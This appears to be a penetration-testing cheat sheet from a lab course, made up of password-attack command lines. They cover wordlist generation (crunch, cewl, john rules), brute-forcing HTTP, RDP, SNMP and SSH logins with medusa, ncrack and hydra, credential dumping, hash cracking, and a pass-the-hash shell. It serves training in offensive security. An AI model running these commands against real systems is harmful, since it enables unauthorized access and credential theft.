## Generating wordlists
crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
    @ - Lower case alpha characters
    , - Upper case alpha characters
    % - Numeric characters
    ^ - Special characters including space
crunch 8 8 -t ,@@^^%%%

## Tools
fgdump.exe
wce -w
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt

## Mutations
vim /etc/john/john.conf
    # Add two numbers to the end of each password
    $[0-9]$[0-9]
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

## Online Attacks
    #http attack
    medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
    
    #rdp attack
    ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35
    
    #snmp attack
    hydra -P password-file.txt -v 10.11.1.219 snmp
    
    #ssh attack
    hydra -l root -P password-file.txt 10.11.1.219 ssh

## Attacking hashes
hash-identifier
john 127.0.0.1.pwdump
john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

## Rainbow Tables

## PTH
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator% //10.11.01.76 cmd